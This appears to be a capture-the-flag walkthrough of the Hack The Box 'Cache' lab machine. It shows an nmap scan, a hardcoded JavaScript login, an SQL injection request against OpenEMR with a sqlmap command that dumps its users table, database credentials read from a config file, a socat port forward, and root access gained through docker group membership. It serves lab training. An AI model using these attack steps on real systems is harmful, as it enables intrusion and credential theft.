InfoSec enthusiast | pwn | RE | CTF | BugBounty



A linux box, which is slow as hell the entry point, because the SQLi is so unestable to get the right thing.
user: get the hash via SQLi on openEMR, crack the hash, get RCE authenticated, reuse the html password on user. root: get the 2nd user password via memcached, then, abusing the docker group, start a new docker mapping the root of the /root to the docker.


Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 10:23 -04
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
Failed to resolve "cache.nmap".
Initiating Ping Scan at 10:23
Scanning [4 ports]
Completed Ping Scan at 10:23, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:23
Completed Parallel DNS resolution of 1 host. at 10:23, 0.03s elapsed
Failed to resolve "cache.nmap".
Initiating SYN Stealth Scan at 10:23
Scanning [65535 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Increasing send delay for from 0 to 5 due to 742 out of 2473 dropped probes since last increase.
SYN Stealth Scan Timing: About 4.51% done; ETC: 10:34 (0:10:56 remaining)
SYN Stealth Scan Timing: About 5.31% done; ETC: 10:42 (0:18:08 remainin

From here we have a simple web server that serve files. The login is just javascript based.


// view-source:
    var error_correctPassword = false;
    var error_username = false;
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         error_username = false;

        if(error_correctPassword == false && error_username ==false){
            return true;
            return false;

Nothing too interesting.

From the author.html we can get another virtual host.



Scanning this, is just an OpenEMR.

There’s an RCE, but we need creds.

There’s another SQLi on msf that hits

It is so sloow 👎

I setted up the proxy on the msf and got the query of the SQLi to let SQLmap do the work.

GET /interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://hms.htb/library/
Connection: close
Cookie: OpenEMR=o2qvm3ahnlvd4qu3ha093ciqsj
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 0

root@Kali:~/Documentos/hackthebox/machines/cache/user# sqlmap -r $PWD/req.txt --threads=1 --dbms=mysql --batch --technique=E --random-agent --proxy= --ignore-timeouts --timeout=30 -D openemr -T users_secure --dump

With SQLi got the hash, after the crack got the password for openemr_admin


Now we can use the authenticated exploit 45161.py

The shell came as www-data

Reusing the webpage password we get in as ash



from the config file

ash@cache:/var/www/hms.htb/public_html$ cat sites/default/sqlconf.php
//  OpenEMR
//  MySQL Config

$host   = 'localhost';
$port   = '3306';
$login  = 'openemr';
$pass   = '3open6emr9';
$dbase  = 'openemr';

//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;

$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
$config = 1; /////////////

My shell is so ugly, so I made a port forward on the remote machine (I uploaded a socat binary), that allows me to enter to the mysql db from my machine 2

ash@cache:~/.f4d3$ ./socat tcp-listen:9001,reuseaddr,fork tcp:"":3306

nothing interesting inside. There’s a process of memcached inside, with the same method as the MySQL connection. With this, we can dump the cache and stored keys:


We can see that luffy is member of docker group

luffy@cache:~$ ls -la
total 32
drwxr-x--- 5 luffy luffy 4096 May 12 16:58 .
drwxr-xr-x 4 root  root  4096 Sep 17  2019 ..
lrwxrwxrwx 1 root  root     9 May  5 11:22 .bash_history -> /dev/null
-rw-r--r-- 1 luffy luffy  220 Sep 17  2019 .bash_logout
-rw-r--r-- 1 luffy luffy 3840 Sep 18  2019 .bashrc
drwx------ 2 luffy luffy 4096 Sep 18  2019 .cache
drwx------ 3 luffy luffy 4096 Sep 18  2019 .gnupg
drwxrwxr-x 3 luffy luffy 4096 Sep 18  2019 .local
-rw-r--r-- 1 luffy luffy  807 Sep 17  2019 .profile
-rw-r--r-- 1 luffy luffy    0 Sep 17  2019 .sudo_as_admin_successful
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

With this in mind, we can execute a new privileged docker, mapping one region of the file system that interest to us, this can be the entire file system:


Got it!